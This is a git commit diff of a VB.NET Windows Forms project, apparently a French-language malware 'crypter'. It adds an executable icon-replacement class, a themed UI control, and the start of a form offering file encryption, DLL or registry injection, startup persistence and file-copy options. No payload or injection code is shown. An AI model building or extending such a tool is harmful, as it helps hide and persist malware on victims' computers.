initial commit
This commit is contained in:
+151
@@ -0,0 +1,151 @@
|
||||
Option Strict On
|
||||
Option Explicit On
|
||||
Option Infer On
|
||||
Imports System.Runtime.InteropServices
|
||||
Imports System.Security
|
||||
Public Class IconChanger
|
||||
<SuppressUnmanagedCodeSecurity()>
|
||||
Private Class NativeMethods
|
||||
<DllImport("kernel32")>
|
||||
Public Shared Function BeginUpdateResource(
|
||||
ByVal fileName As String,
|
||||
<MarshalAs(UnmanagedType.Bool)> ByVal deleteExistingResources As Boolean) As IntPtr
|
||||
End Function
|
||||
<DllImport("kernel32")>
|
||||
Public Shared Function UpdateResource(
|
||||
ByVal hUpdate As IntPtr,
|
||||
ByVal type As IntPtr,
|
||||
ByVal name As IntPtr,
|
||||
ByVal language As Short,
|
||||
<MarshalAs(UnmanagedType.LPArray, SizeParamIndex:=5)>
|
||||
ByVal data() As Byte,
|
||||
ByVal dataSize As Integer) As <MarshalAs(UnmanagedType.Bool)> Boolean
|
||||
End Function
|
||||
<DllImport("kernel32")>
|
||||
Public Shared Function EndUpdateResource(
|
||||
ByVal hUpdate As IntPtr,
|
||||
<MarshalAs(UnmanagedType.Bool)> ByVal discard As Boolean) As <MarshalAs(UnmanagedType.Bool)> Boolean
|
||||
End Function
|
||||
End Class
|
||||
<StructLayout(LayoutKind.Sequential)>
|
||||
Private Structure ICONDIR
|
||||
Public Reserved As UShort
|
||||
Public Type As UShort
|
||||
Public Count As UShort
|
||||
End Structure
|
||||
<StructLayout(LayoutKind.Sequential)>
|
||||
Private Structure ICONDIRENTRY
|
||||
Public Width As Byte
|
||||
Public Height As Byte
|
||||
Public ColorCount As Byte
|
||||
Public Reserved As Byte
|
||||
Public Planes As UShort
|
||||
Public BitCount As UShort
|
||||
Public BytesInRes As Integer
|
||||
Public ImageOffset As Integer
|
||||
End Structure
|
||||
<StructLayout(LayoutKind.Sequential)>
|
||||
Private Structure BITMAPINFOHEADER
|
||||
Public Size As UInteger
|
||||
Public Width As Integer
|
||||
Public Height As Integer
|
||||
Public Planes As UShort
|
||||
Public BitCount As UShort
|
||||
Public Compression As UInteger
|
||||
Public SizeImage As UInteger
|
||||
Public XPelsPerMeter As Integer
|
||||
Public YPelsPerMeter As Integer
|
||||
Public ClrUsed As UInteger
|
||||
Public ClrImportant As UInteger
|
||||
End Structure
|
||||
<StructLayout(LayoutKind.Sequential, Pack:=2)>
|
||||
Private Structure GRPICONDIRENTRY
|
||||
Public Width As Byte
|
||||
Public Height As Byte
|
||||
Public ColorCount As Byte
|
||||
Public Reserved As Byte
|
||||
Public Planes As UShort
|
||||
Public BitCount As UShort
|
||||
Public BytesInRes As Integer
|
||||
Public ID As UShort
|
||||
End Structure
|
||||
Public Shared Sub InjectIcon(ByVal exeFileName As String, ByVal iconFileName As String)
|
||||
InjectIcon(exeFileName, iconFileName, 1, 1)
|
||||
End Sub
|
||||
Public Shared Sub InjectIcon(ByVal exeFileName As String, ByVal iconFileName As String, ByVal iconGroupID As UInteger, ByVal iconBaseID As UInteger)
|
||||
Const RT_ICON As UInteger = 3UI
|
||||
Const RT_GROUP_ICON As UInteger = 14UI
|
||||
Dim iconFile As IconFile = IconFile.FromFile(iconFileName)
|
||||
Dim hUpdate = NativeMethods.BeginUpdateResource(exeFileName, False)
|
||||
Dim data = iconFile.CreateIconGroupData(iconBaseID)
|
||||
NativeMethods.UpdateResource(hUpdate, New IntPtr(RT_GROUP_ICON), New IntPtr(iconGroupID), 0, data, data.Length)
|
||||
For i = 0 To iconFile.ImageCount - 1
|
||||
Dim image = iconFile.ImageData(i)
|
||||
NativeMethods.UpdateResource(hUpdate, New IntPtr(RT_ICON), New IntPtr(iconBaseID + i), 0, image, image.Length)
|
||||
Next
|
||||
NativeMethods.EndUpdateResource(hUpdate, False)
|
||||
End Sub
|
||||
Private Class IconFile
|
||||
Private iconDir As New ICONDIR
|
||||
Private iconEntry() As ICONDIRENTRY
|
||||
Private iconImage()() As Byte
|
||||
Public ReadOnly Property ImageCount() As Integer
|
||||
Get
|
||||
Return iconDir.Count
|
||||
End Get
|
||||
End Property
|
||||
Public ReadOnly Property ImageData(ByVal index As Integer) As Byte()
|
||||
Get
|
||||
Return iconImage(index)
|
||||
End Get
|
||||
End Property
|
||||
Private Sub New()
|
||||
End Sub
|
||||
Public Shared Function FromFile(ByVal filename As String) As IconFile
|
||||
Dim instance As New IconFile
|
||||
Dim fileBytes() As Byte = IO.File.ReadAllBytes(filename)
|
||||
Dim pinnedBytes = GCHandle.Alloc(fileBytes, GCHandleType.Pinned)
|
||||
instance.iconDir = DirectCast(Marshal.PtrToStructure(pinnedBytes.AddrOfPinnedObject, GetType(ICONDIR)), ICONDIR)
|
||||
instance.iconEntry = New ICONDIRENTRY(instance.iconDir.Count - 1) {}
|
||||
instance.iconImage = New Byte(instance.iconDir.Count - 1)() {}
|
||||
Dim offset = Marshal.SizeOf(instance.iconDir)
|
||||
Dim iconDirEntryType = GetType(ICONDIRENTRY)
|
||||
Dim size = Marshal.SizeOf(iconDirEntryType)
|
||||
For i = 0 To instance.iconDir.Count - 1
|
||||
Dim entry = DirectCast(Marshal.PtrToStructure(New IntPtr(pinnedBytes.AddrOfPinnedObject.ToInt64 + offset), iconDirEntryType), ICONDIRENTRY)
|
||||
instance.iconEntry(i) = entry
|
||||
instance.iconImage(i) = New Byte(entry.BytesInRes - 1) {}
|
||||
Buffer.BlockCopy(fileBytes, entry.ImageOffset, instance.iconImage(i), 0, entry.BytesInRes)
|
||||
offset += size
|
||||
Next
|
||||
pinnedBytes.Free()
|
||||
Return instance
|
||||
End Function
|
||||
Public Function CreateIconGroupData(ByVal iconBaseID As UInteger) As Byte()
|
||||
Dim sizeOfIconGroupData As Integer = Marshal.SizeOf(GetType(ICONDIR)) + Marshal.SizeOf(GetType(GRPICONDIRENTRY)) * ImageCount
|
||||
Dim data(sizeOfIconGroupData - 1) As Byte
|
||||
Dim pinnedData = GCHandle.Alloc(data, GCHandleType.Pinned)
|
||||
Marshal.StructureToPtr(iconDir, pinnedData.AddrOfPinnedObject, False)
|
||||
Dim offset = Marshal.SizeOf(iconDir)
|
||||
For i = 0 To ImageCount - 1
|
||||
Dim grpEntry As New GRPICONDIRENTRY
|
||||
Dim bitmapheader As New BITMAPINFOHEADER
|
||||
Dim pinnedBitmapInfoHeader = GCHandle.Alloc(bitmapheader, GCHandleType.Pinned)
|
||||
Marshal.Copy(ImageData(i), 0, pinnedBitmapInfoHeader.AddrOfPinnedObject, Marshal.SizeOf(GetType(BITMAPINFOHEADER)))
|
||||
pinnedBitmapInfoHeader.Free()
|
||||
grpEntry.Width = iconEntry(i).Width
|
||||
grpEntry.Height = iconEntry(i).Height
|
||||
grpEntry.ColorCount = iconEntry(i).ColorCount
|
||||
grpEntry.Reserved = iconEntry(i).Reserved
|
||||
grpEntry.Planes = bitmapheader.Planes
|
||||
grpEntry.BitCount = bitmapheader.BitCount
|
||||
grpEntry.BytesInRes = iconEntry(i).BytesInRes
|
||||
grpEntry.ID = CType(iconBaseID + i, UShort)
|
||||
Marshal.StructureToPtr(grpEntry, New IntPtr(pinnedData.AddrOfPinnedObject.ToInt64 + offset), False)
|
||||
offset += Marshal.SizeOf(GetType(GRPICONDIRENTRY))
|
||||
Next
|
||||
pinnedData.Free()
|
||||
Return data
|
||||
End Function
|
||||
End Class
|
||||
End Class
|
||||
@@ -0,0 +1,310 @@
|
||||
'Creator: Aeonhack
|
||||
'Date: 5/01/2011 (roughly)
|
||||
'Site: www.elitevs.net
|
||||
'Version: 1.4
|
||||
'Credits to Vorfin for the original concept.
|
||||
|
||||
|
||||
Imports System.Drawing.Drawing2D
|
||||
Imports System.ComponentModel
|
||||
|
||||
MustInherit Class ThemeControl
|
||||
Inherits Control
|
||||
|
||||
#Region " Initialization "
|
||||
|
||||
Protected G As Graphics, B As Bitmap
|
||||
Sub New()
|
||||
SetStyle(DirectCast(139270, ControlStyles), True)
|
||||
B = New Bitmap(1, 1)
|
||||
G = Graphics.FromImage(B)
|
||||
End Sub
|
||||
|
||||
Sub AllowTransparent()
|
||||
SetStyle(ControlStyles.Opaque, False)
|
||||
SetStyle(ControlStyles.SupportsTransparentBackColor, True)
|
||||
End Sub
|
||||
|
||||
Overrides Property Text As String
|
||||
Get
|
||||
Return MyBase.Text
|
||||
End Get
|
||||
Set(ByVal v As String)
|
||||
MyBase.Text = v
|
||||
Invalidate()
|
||||
End Set
|
||||
End Property
|
||||
#End Region
|
||||
|
||||
#Region " Mouse Handling "
|
||||
|
||||
Protected Enum State As Byte
|
||||
MouseNone = 0
|
||||
MouseOver = 1
|
||||
MouseDown = 2
|
||||
End Enum
|
||||
|
||||
Protected MouseState As State
|
||||
Protected Overrides Sub OnMouseLeave(ByVal e As EventArgs)
|
||||
ChangeMouseState(State.MouseNone)
|
||||
MyBase.OnMouseLeave(e)
|
||||
End Sub
|
||||
Protected Overrides Sub OnMouseEnter(ByVal e As EventArgs)
|
||||
ChangeMouseState(State.MouseOver)
|
||||
MyBase.OnMouseEnter(e)
|
||||
End Sub
|
||||
Protected Overrides Sub OnMouseUp(ByVal e As MouseEventArgs)
|
||||
ChangeMouseState(State.MouseOver)
|
||||
MyBase.OnMouseUp(e)
|
||||
End Sub
|
||||
Protected Overrides Sub OnMouseDown(ByVal e As MouseEventArgs)
|
||||
If e.Button = MouseButtons.Left Then ChangeMouseState(State.MouseDown)
|
||||
MyBase.OnMouseDown(e)
|
||||
End Sub
|
||||
|
||||
Private Sub ChangeMouseState(ByVal e As State)
|
||||
MouseState = e
|
||||
Invalidate()
|
||||
End Sub
|
||||
|
||||
#End Region
|
||||
|
||||
#Region " Convienence "
|
||||
|
||||
MustOverride Sub PaintHook()
|
||||
Protected NotOverridable Overrides Sub OnPaint(ByVal e As PaintEventArgs)
|
||||
If Width = 0 OrElse Height = 0 Then Return
|
||||
PaintHook()
|
||||
e.Graphics.DrawImage(B, 0, 0)
|
||||
End Sub
|
||||
|
||||
Protected Overrides Sub OnSizeChanged(ByVal e As EventArgs)
|
||||
If Not Width = 0 AndAlso Not Height = 0 Then
|
||||
B = New Bitmap(Width, Height)
|
||||
G = Graphics.FromImage(B)
|
||||
Invalidate()
|
||||
End If
|
||||
MyBase.OnSizeChanged(e)
|
||||
End Sub
|
||||
|
||||
Private _NoRounding As Boolean
|
||||
Property NoRounding() As Boolean
|
||||
Get
|
||||
Return _NoRounding
|
||||
End Get
|
||||
Set(ByVal v As Boolean)
|
||||
_NoRounding = v
|
||||
Invalidate()
|
||||
End Set
|
||||
End Property
|
||||
|
||||
Private _Image As Image
|
||||
Property Image() As Image
|
||||
Get
|
||||
Return _Image
|
||||
End Get
|
||||
Set(ByVal value As Image)
|
||||
_Image = value
|
||||
Invalidate()
|
||||
End Set
|
||||
End Property
|
||||
ReadOnly Property ImageWidth() As Integer
|
||||
Get
|
||||
If _Image Is Nothing Then Return 0
|
||||
Return _Image.Width
|
||||
End Get
|
||||
End Property
|
||||
ReadOnly Property ImageTop() As Integer
|
||||
Get
|
||||
If _Image Is Nothing Then Return 0
|
||||
Return Height \ 2 - _Image.Height \ 2
|
||||
End Get
|
||||
End Property
|
||||
|
||||
Private _Size As Size
|
||||
Private _Rectangle As Rectangle
|
||||
Private _Gradient As LinearGradientBrush
|
||||
Private _Brush As SolidBrush
|
||||
|
||||
Protected Sub DrawCorners(ByVal c As Color, ByVal rect As Rectangle)
|
||||
If _NoRounding Then Return
|
||||
|
||||
B.SetPixel(rect.X, rect.Y, c)
|
||||
B.SetPixel(rect.X + (rect.Width - 1), rect.Y, c)
|
||||
B.SetPixel(rect.X, rect.Y + (rect.Height - 1), c)
|
||||
B.SetPixel(rect.X + (rect.Width - 1), rect.Y + (rect.Height - 1), c)
|
||||
End Sub
|
||||
|
||||
Protected Sub DrawBorders(ByVal p1 As Pen, ByVal p2 As Pen, ByVal rect As Rectangle)
|
||||
G.DrawRectangle(p1, rect.X, rect.Y, rect.Width - 1, rect.Height - 1)
|
||||
G.DrawRectangle(p2, rect.X + 1, rect.Y + 1, rect.Width - 3, rect.Height - 3)
|
||||
End Sub
|
||||
|
||||
Protected Sub DrawText(ByVal a As HorizontalAlignment, ByVal c As Color, ByVal x As Integer)
|
||||
DrawText(a, c, x, 0)
|
||||
End Sub
|
||||
Protected Sub DrawText(ByVal a As HorizontalAlignment, ByVal c As Color, ByVal x As Integer, ByVal y As Integer)
|
||||
If String.IsNullOrEmpty(Text) Then Return
|
||||
_Size = G.MeasureString(Text, Font).ToSize
|
||||
_Brush = New SolidBrush(c)
|
||||
|
||||
Select Case a
|
||||
Case HorizontalAlignment.Left
|
||||
G.DrawString(Text, Font, _Brush, x, Height \ 2 - _Size.Height \ 2 + y)
|
||||
Case HorizontalAlignment.Right
|
||||
G.DrawString(Text, Font, _Brush, Width - _Size.Width - x, Height \ 2 - _Size.Height \ 2 + y)
|
||||
Case HorizontalAlignment.Center
|
||||
G.DrawString(Text, Font, _Brush, Width \ 2 - _Size.Width \ 2 + x, Height \ 2 - _Size.Height \ 2 + y)
|
||||
End Select
|
||||
End Sub
|
||||
|
||||
Protected Sub DrawIcon(ByVal a As HorizontalAlignment, ByVal x As Integer)
|
||||
DrawIcon(a, x, 0)
|
||||
End Sub
|
||||
Protected Sub DrawIcon(ByVal a As HorizontalAlignment, ByVal x As Integer, ByVal y As Integer)
|
||||
If _Image Is Nothing Then Return
|
||||
Select Case a
|
||||
Case HorizontalAlignment.Left
|
||||
G.DrawImage(_Image, x, Height \ 2 - _Image.Height \ 2 + y)
|
||||
Case HorizontalAlignment.Right
|
||||
G.DrawImage(_Image, Width - _Image.Width - x, Height \ 2 - _Image.Height \ 2 + y)
|
||||
Case HorizontalAlignment.Center
|
||||
G.DrawImage(_Image, Width \ 2 - _Image.Width \ 2, Height \ 2 - _Image.Height \ 2)
|
||||
End Select
|
||||
End Sub
|
||||
|
||||
Protected Sub DrawGradient(ByVal c1 As Color, ByVal c2 As Color, ByVal x As Integer, ByVal y As Integer, ByVal width As Integer, ByVal height As Integer, ByVal angle As Single)
|
||||
_Rectangle = New Rectangle(x, y, width, height)
|
||||
_Gradient = New LinearGradientBrush(_Rectangle, c1, c2, angle)
|
||||
G.FillRectangle(_Gradient, _Rectangle)
|
||||
End Sub
|
||||
#End Region
|
||||
|
||||
End Class
|
||||
|
||||
<DefaultEvent("CharacterSelection")>
|
||||
Class RandomPool
|
||||
Inherits ThemeControl
|
||||
|
||||
Private GO As Graphics, _Size As Size
|
||||
Event CharacterSelection(ByVal s As Object, ByVal c As Char)
|
||||
|
||||
Sub New()
|
||||
GO = Graphics.FromHwndInternal(Handle)
|
||||
End Sub
|
||||
|
||||
Private _Range As String = "0123456789ABCDEF"
|
||||
Property Range() As String
|
||||
Get
|
||||
Return _Range
|
||||
End Get
|
||||
Set(ByVal v As String)
|
||||
_Range = v
|
||||
UpdateSize()
|
||||
End Set
|
||||
End Property
|
||||
|
||||
Private _RangePadding As Integer = 2
|
||||
Public Property RangePadding() As Integer
|
||||
Get
|
||||
Return _RangePadding
|
||||
End Get
|
||||
Set(ByVal v As Integer)
|
||||
_RangePadding = v
|
||||
UpdateSize()
|
||||
End Set
|
||||
End Property
|
||||
|
||||
Overrides Property Font As Font
|
||||
Get
|
||||
Return MyBase.Font
|
||||
End Get
|
||||
Set(ByVal v As Font)
|
||||
MyBase.Font = v
|
||||
UpdateSize()
|
||||
End Set
|
||||
End Property
|
||||
|
||||
Private _Brush As Brush = SystemBrushes.ControlText
|
||||
Overrides Property ForeColor As Color
|
||||
Get
|
||||
Return MyBase.ForeColor
|
||||
End Get
|
||||
Set(ByVal v As Color)
|
||||
MyBase.ForeColor = v
|
||||
_Brush = New SolidBrush(v)
|
||||
Invalidate()
|
||||
End Set
|
||||
End Property
|
||||
|
||||
Private Count As Integer
|
||||
Private Sub UpdateSize()
|
||||
_Size = New Size(0, 0)
|
||||
|
||||
Dim T As Size
|
||||
For I As Integer = 0 To _Range.Length - 1
|
||||
T = GO.MeasureString(_Range(I), Font).ToSize()
|
||||
T.Width += _RangePadding
|
||||
T.Height += _RangePadding
|
||||
|
||||
If T.Height > _Size.Height Then _Size.Height = T.Height
|
||||
If T.Width > _Size.Width Then _Size.Width = T.Width
|
||||
Next
|
||||
|
||||
Randomize()
|
||||
End Sub
|
||||
|
||||
Private Index1, Index2 As Integer, Items As Char()
|
||||
Protected Overrides Sub OnMouseMove(ByVal e As MouseEventArgs)
|
||||
Index1 = GetIndex(e.X, e.Y)
|
||||
If Index1 = Index2 Then Return
|
||||
|
||||
RaiseEvent CharacterSelection(Me, Items(Index1))
|
||||
|
||||
Randomize(Index1 - Count)
|
||||
Randomize(Index1 - 1)
|
||||
Randomize(Index1)
|
||||
Randomize(Index1 + 1)
|
||||
Randomize(Index1 + Count)
|
||||
|
||||
Index2 = Index1
|
||||
Invalidate()
|
||||
End Sub
|
||||
Protected Overrides Sub OnSizeChanged(ByVal e As EventArgs)
|
||||
If _Size.Width = 0 Then UpdateSize() Else Randomize()
|
||||
MyBase.OnSizeChanged(e)
|
||||
End Sub
|
||||
|
||||
Overrides Sub PaintHook()
|
||||
G.Clear(BackColor)
|
||||
|
||||
For X As Integer = 0 To Width - 1 Step _Size.Width
|
||||
For Y As Integer = 0 To Height - 1 Step _Size.Height
|
||||
G.DrawString(Items(GetIndex(X, Y)), Font, _Brush, X, Y)
|
||||
Next
|
||||
Next
|
||||
|
||||
End Sub
|
||||
|
||||
Private Function GetIndex(ByVal x As Integer, ByVal y As Integer) As Integer
|
||||
Return (y \ _Size.Height) * Count + (x \ _Size.Width)
|
||||
End Function
|
||||
|
||||
Private RN As Random
|
||||
Private Sub Randomize()
|
||||
Count = CInt(Math.Ceiling(Width / _Size.Width))
|
||||
|
||||
RN = New Random(Guid.NewGuid.GetHashCode)
|
||||
Items = New Char(CInt(Math.Ceiling(Width / _Size.Width) * Math.Ceiling(Height / _Size.Height)) - 1) {}
|
||||
|
||||
For I As Integer = 0 To Items.Length - 1
|
||||
Items(I) = _Range(RN.Next(_Range.Length))
|
||||
Next
|
||||
|
||||
Invalidate()
|
||||
End Sub
|
||||
Private Sub Randomize(ByVal index As Integer)
|
||||
If index > -1 AndAlso index < Items.Length Then Items(index) = _Range(RN.Next(_Range.Length))
|
||||
End Sub
|
||||
|
||||
End Class
|
||||
+519
@@ -0,0 +1,519 @@
|
||||
<Global.Microsoft.VisualBasic.CompilerServices.DesignerGenerated()>
|
||||
Partial Class Form1
|
||||
Inherits System.Windows.Forms.Form
|
||||
|
||||
'Form remplace la méthode Dispose pour nettoyer la liste des composants.
|
||||
<System.Diagnostics.DebuggerNonUserCode()>
|
||||
Protected Overrides Sub Dispose(ByVal disposing As Boolean)
|
||||
Try
|
||||
If disposing AndAlso components IsNot Nothing Then
|
||||
components.Dispose()
|
||||
End If
|
||||
Finally
|
||||
MyBase.Dispose(disposing)
|
||||
End Try
|
||||
End Sub
|
||||
|
||||
'Requise par le Concepteur Windows Form
|
||||
Private components As System.ComponentModel.IContainer
|
||||
|
||||
'REMARQUE : la procédure suivante est requise par le Concepteur Windows Form
|
||||
'Elle peut être modifiée à l'aide du Concepteur Windows Form.
|
||||
'Ne la modifiez pas à l'aide de l'éditeur de code.
|
||||
<System.Diagnostics.DebuggerStepThrough()>
|
||||
Private Sub InitializeComponent()
|
||||
Dim resources As System.ComponentModel.ComponentResourceManager = New System.ComponentModel.ComponentResourceManager(GetType(Form1))
|
||||
Me.Button1 = New System.Windows.Forms.Button()
|
||||
Me.ChargerFichier = New System.Windows.Forms.Button()
|
||||
Me.TextBoxFichier = New System.Windows.Forms.TextBox()
|
||||
Me.Label1 = New System.Windows.Forms.Label()
|
||||
Me.Label2 = New System.Windows.Forms.Label()
|
||||
Me.TabControl1 = New System.Windows.Forms.TabControl()
|
||||
Me.TabPage1 = New System.Windows.Forms.TabPage()
|
||||
Me.TextBoxEncryption = New System.Windows.Forms.TextBox()
|
||||
Me.ButtonChangerIco = New System.Windows.Forms.Button()
|
||||
Me.PictureIcon = New System.Windows.Forms.PictureBox()
|
||||
Me.CheckBoxIcon = New System.Windows.Forms.CheckBox()
|
||||
Me.Label8 = New System.Windows.Forms.Label()
|
||||
Me.Label7 = New System.Windows.Forms.Label()
|
||||
Me.TabPage2 = New System.Windows.Forms.TabPage()
|
||||
Me.Label12 = New System.Windows.Forms.Label()
|
||||
Me.Label11 = New System.Windows.Forms.Label()
|
||||
Me.Label10 = New System.Windows.Forms.Label()
|
||||
Me.Label9 = New System.Windows.Forms.Label()
|
||||
Me.Acheter = New System.Windows.Forms.Button()
|
||||
Me.Label6 = New System.Windows.Forms.Label()
|
||||
Me.GroupBoxType = New System.Windows.Forms.GroupBox()
|
||||
Me.RadioButtonNatif = New System.Windows.Forms.RadioButton()
|
||||
Me.RadioButtonNet = New System.Windows.Forms.RadioButton()
|
||||
Me.GroupBoxInjection = New System.Windows.Forms.GroupBox()
|
||||
Me.RadioButtonReg = New System.Windows.Forms.RadioButton()
|
||||
Me.RadioButtonDll = New System.Windows.Forms.RadioButton()
|
||||
Me.GroupBoxCopier = New System.Windows.Forms.GroupBox()
|
||||
Me.TextBoxFichiercop = New System.Windows.Forms.TextBox()
|
||||
Me.Label5 = New System.Windows.Forms.Label()
|
||||
Me.TextBoxDossier = New System.Windows.Forms.TextBox()
|
||||
Me.Label4 = New System.Windows.Forms.Label()
|
||||
Me.GroupBoxStartup = New System.Windows.Forms.GroupBox()
|
||||
Me.TextBoxClestartup = New System.Windows.Forms.TextBox()
|
||||
Me.Label3 = New System.Windows.Forms.Label()
|
||||
Me.Button2 = New System.Windows.Forms.Button()
|
||||
Me.ProgressBar1 = New System.Windows.Forms.ProgressBar()
|
||||
Me.RandomPool1 = New SpaceCrypter___Free_Edition.RandomPool()
|
||||
Me.TabControl1.SuspendLayout()
|
||||
Me.TabPage1.SuspendLayout()
|
||||
CType(Me.PictureIcon, System.ComponentModel.ISupportInitialize).BeginInit()
|
||||
Me.TabPage2.SuspendLayout()
|
||||
Me.GroupBoxType.SuspendLayout()
|
||||
Me.GroupBoxInjection.SuspendLayout()
|
||||
Me.GroupBoxCopier.SuspendLayout()
|
||||
Me.GroupBoxStartup.SuspendLayout()
|
||||
Me.SuspendLayout()
|
||||
'
|
||||
'Button1
|
||||
'
|
||||
Me.Button1.Location = New System.Drawing.Point(486, 197)
|
||||
Me.Button1.Name = "Button1"
|
||||
Me.Button1.Size = New System.Drawing.Size(75, 23)
|
||||
Me.Button1.TabIndex = 0
|
||||
Me.Button1.Text = "Crypter"
|
||||
Me.Button1.UseVisualStyleBackColor = True
|
||||
'
|
||||
'ChargerFichier
|
||||
'
|
||||
Me.ChargerFichier.Location = New System.Drawing.Point(387, 22)
|
||||
Me.ChargerFichier.Name = "ChargerFichier"
|
||||
Me.ChargerFichier.Size = New System.Drawing.Size(75, 20)
|
||||
Me.ChargerFichier.TabIndex = 1
|
||||
Me.ChargerFichier.Text = "Ouvrir"
|
||||
Me.ChargerFichier.TextAlign = System.Drawing.ContentAlignment.TopCenter
|
||||
Me.ChargerFichier.UseVisualStyleBackColor = True
|
||||
'
|
||||
'TextBoxFichier
|
||||
'
|
||||
Me.TextBoxFichier.Location = New System.Drawing.Point(8, 22)
|
||||
Me.TextBoxFichier.Name = "TextBoxFichier"
|
||||
Me.TextBoxFichier.ReadOnly = True
|
||||
Me.TextBoxFichier.Size = New System.Drawing.Size(373, 20)
|
||||
Me.TextBoxFichier.TabIndex = 2
|
||||
'
|
||||
'Label1
|
||||
'
|
||||
Me.Label1.AutoSize = True
|
||||
Me.Label1.Location = New System.Drawing.Point(5, 6)
|
||||
Me.Label1.Name = "Label1"
|
||||
Me.Label1.Size = New System.Drawing.Size(88, 13)
|
||||
Me.Label1.TabIndex = 3
|
||||
Me.Label1.Text = "Fichier a crypter :"
|
||||
'
|
||||
'Label2
|
||||
'
|
||||
Me.Label2.AutoSize = True
|
||||
Me.Label2.Location = New System.Drawing.Point(5, 57)
|
||||
Me.Label2.Name = "Label2"
|
||||
Me.Label2.Size = New System.Drawing.Size(88, 13)
|
||||
Me.Label2.TabIndex = 4
|
||||
Me.Label2.Text = "Clé d'encryption :"
|
||||
'
|
||||
'TabControl1
|
||||
'
|
||||
Me.TabControl1.Controls.Add(Me.TabPage1)
|
||||
Me.TabControl1.Controls.Add(Me.TabPage2)
|
||||
Me.TabControl1.Location = New System.Drawing.Point(1, 1)
|
||||
Me.TabControl1.Name = "TabControl1"
|
||||
Me.TabControl1.SelectedIndex = 0
|
||||
Me.TabControl1.Size = New System.Drawing.Size(476, 245)
|
||||
Me.TabControl1.TabIndex = 8
|
||||
'
|
||||
'TabPage1
|
||||
'
|
||||
Me.TabPage1.Controls.Add(Me.TextBoxEncryption)
|
||||
Me.TabPage1.Controls.Add(Me.ButtonChangerIco)
|
||||
Me.TabPage1.Controls.Add(Me.PictureIcon)
|
||||
Me.TabPage1.Controls.Add(Me.CheckBoxIcon)
|
||||
Me.TabPage1.Controls.Add(Me.Label8)
|
||||
Me.TabPage1.Controls.Add(Me.Label7)
|
||||
Me.TabPage1.Controls.Add(Me.RandomPool1)
|
||||
Me.TabPage1.Controls.Add(Me.ChargerFichier)
|
||||
Me.TabPage1.Controls.Add(Me.Label1)
|
||||
Me.TabPage1.Controls.Add(Me.Label2)
|
||||
Me.TabPage1.Controls.Add(Me.TextBoxFichier)
|
||||
Me.TabPage1.Location = New System.Drawing.Point(4, 22)
|
||||
Me.TabPage1.Name = "TabPage1"
|
||||
Me.TabPage1.Padding = New System.Windows.Forms.Padding(3)
|
||||
Me.TabPage1.Size = New System.Drawing.Size(468, 219)
|
||||
Me.TabPage1.TabIndex = 0
|
||||
Me.TabPage1.Text = "Accueil"
|
||||
Me.TabPage1.UseVisualStyleBackColor = True
|
||||
'
|
||||
'TextBoxEncryption
|
||||
'
|
||||
Me.TextBoxEncryption.Location = New System.Drawing.Point(8, 73)
|
||||
Me.TextBoxEncryption.Name = "TextBoxEncryption"
|
||||
Me.TextBoxEncryption.ReadOnly = True
|
||||
Me.TextBoxEncryption.Size = New System.Drawing.Size(454, 20)
|
||||
Me.TextBoxEncryption.TabIndex = 10
|
||||
'
|
||||
'ButtonChangerIco
|
||||
'
|
||||
Me.ButtonChangerIco.Enabled = False
|
||||
Me.ButtonChangerIco.Location = New System.Drawing.Point(290, 188)
|
||||
Me.ButtonChangerIco.Name = "ButtonChangerIco"
|
||||
Me.ButtonChangerIco.Size = New System.Drawing.Size(106, 23)
|
||||
Me.ButtonChangerIco.TabIndex = 9
|
||||
Me.ButtonChangerIco.Text = "Charger un icon"
|
||||
Me.ButtonChangerIco.UseVisualStyleBackColor = True
|
||||
'
|
||||
'PictureIcon
|
||||
'
|
||||
Me.PictureIcon.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle
|
||||
Me.PictureIcon.Location = New System.Drawing.Point(402, 167)
|
||||
Me.PictureIcon.Name = "PictureIcon"
|
||||
Me.PictureIcon.Size = New System.Drawing.Size(44, 44)
|
||||
Me.PictureIcon.SizeMode = System.Windows.Forms.PictureBoxSizeMode.CenterImage
|
||||
Me.PictureIcon.TabIndex = 8
|
||||
Me.PictureIcon.TabStop = False
|
||||
'
|
||||
'CheckBoxIcon
|
||||
'
|
||||
Me.CheckBoxIcon.AutoSize = True
|
||||
Me.CheckBoxIcon.Location = New System.Drawing.Point(290, 167)
|
||||
Me.CheckBoxIcon.Name = "CheckBoxIcon"
|
||||
Me.CheckBoxIcon.Size = New System.Drawing.Size(89, 17)
|
||||
Me.CheckBoxIcon.TabIndex = 0
|
||||
Me.CheckBoxIcon.Text = "Icon changer"
|
||||
Me.CheckBoxIcon.UseVisualStyleBackColor = True
|
||||
'
|
||||
'Label8
|
||||
'
|
||||
Me.Label8.AutoSize = True
|
||||
Me.Label8.Font = New System.Drawing.Font("Microsoft Sans Serif", 10.0!)
|
||||
Me.Label8.Location = New System.Drawing.Point(25, 188)
|
||||
Me.Label8.Name = "Label8"
|
||||
Me.Label8.Size = New System.Drawing.Size(145, 17)
|
||||
Me.Label8.TabIndex = 7
|
||||
Me.Label8.Text = "Aucun fichier chargé !"
|
||||
'
|
||||
'Label7
|
||||
'
|
||||
Me.Label7.AutoSize = True
|
||||
Me.Label7.Font = New System.Drawing.Font("Microsoft Sans Serif", 10.0!)
|
||||
Me.Label7.Location = New System.Drawing.Point(7, 167)
|
||||
Me.Label7.Name = "Label7"
|
||||
Me.Label7.Size = New System.Drawing.Size(184, 17)
|
||||
Me.Label7.TabIndex = 6
|
||||
Me.Label7.Text = "Information de votre fichier :"
|
||||
'
|
||||
'TabPage2
|
||||
'
|
||||
Me.TabPage2.Controls.Add(Me.Label12)
|
||||
Me.TabPage2.Controls.Add(Me.Label11)
|
||||
Me.TabPage2.Controls.Add(Me.Label10)
|
||||
Me.TabPage2.Controls.Add(Me.Label9)
|
||||
Me.TabPage2.Controls.Add(Me.Acheter)
|
||||
Me.TabPage2.Controls.Add(Me.Label6)
|
||||
Me.TabPage2.Controls.Add(Me.GroupBoxType)
|
||||
Me.TabPage2.Controls.Add(Me.GroupBoxInjection)
|
||||
Me.TabPage2.Controls.Add(Me.GroupBoxCopier)
|
||||
Me.TabPage2.Controls.Add(Me.GroupBoxStartup)
|
||||
Me.TabPage2.Controls.Add(Me.Button1)
|
||||
Me.TabPage2.Location = New System.Drawing.Point(4, 22)
|
||||
Me.TabPage2.Name = "TabPage2"
|
||||
Me.TabPage2.Padding = New System.Windows.Forms.Padding(3)
|
||||
Me.TabPage2.Size = New System.Drawing.Size(468, 219)
|
||||
Me.TabPage2.TabIndex = 1
|
||||
Me.TabPage2.Text = "Options"
|
||||
Me.TabPage2.UseVisualStyleBackColor = True
